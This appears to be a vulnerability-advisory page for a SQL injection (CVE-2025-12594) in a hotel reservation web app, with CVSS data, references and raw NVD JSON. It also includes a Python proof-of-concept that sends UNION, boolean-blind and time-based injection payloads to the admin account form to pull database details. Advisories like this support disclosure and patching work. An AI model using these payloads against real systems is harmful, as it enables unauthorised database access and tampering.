CVE-2025-12594

Description

A security flaw has been discovered in code-projects Simple Online Hotel Reservation System 2.0. This affects an unknown function of the file /admin/add_account.php. The manipulation of the argument Name results in sql injection. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fabian:simple_online_hotel_reservation_system:2.0:*:*:*:*:*:*:* - VULNERABLE

Simple Online Hotel Reservation System 2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-12594 SQL Injection PoC # Target: Simple Online Hotel Reservation System 2.0 # Endpoint: /admin/add_account.php # Parameter: Name import requests import sys target_url = "http://target.com/admin/add_account.php" # SQL Injection Payloads payloads = [ # Basic SQL injection test "admin' OR '1'='1", # UNION-based injection to extract database info "admin' UNION SELECT NULL,version(),user(),database()-- -", # Extract admin tables "admin' UNION SELECT NULL,table_name,column_name FROM information_schema.columns WHERE table_name='admin'-- -", # Blind boolean-based injection "admin' AND (SELECT COUNT(*) FROM admin) > 0-- -", # Time-based blind injection "admin'; SLEEP(5)-- -" ] def test_sqli(payload): data = { 'Name': payload, 'Email': '[email protected]', 'Password': 'test123', 'submit': 'Add' } try: response = requests.post(target_url, data=data, timeout=10) if 'error' in response.text.lower() or response.status_code != 200: return True except: pass return False # Main execution if __name__ == "__main__": print(f"[*] Testing CVE-2025-12594 SQL Injection") print(f"[*] Target: {target_url}") for payload in payloads: print(f"[*] Testing payload: {payload}") if test_sqli(payload): print(f"[!] Vulnerability confirmed with payload: {payload}") break print("[*] Testing complete")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12594
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12594
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12594/
[4] VulDB https://vuldb.com/cve/CVE-2025-12594
[5] https://code-projects.org/
[6] https://github.com/asd1238525/cve/blob/main/SQL10.md
[7] https://vuldb.com/?ctiid.330889
[8] https://vuldb.com/?id.330889
[9] https://vuldb.com/?submit.677576

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12594", "sourceIdentifier": "[email protected]", "published": "2025-11-02T09:15:40.573", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in code-projects Simple Online Hotel Reservation System 2.0. This affects an unknown function of the file /admin/add_account.php. The manipulation of the argument Name results in sql injection. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:simple_online_hotel_reservation_system:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "DF75C9AA-91F0-4AED-AEAA-94109CF2F010"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/asd1238525/cve/blob/main/SQL10.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.330889", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.330889", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.677576", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}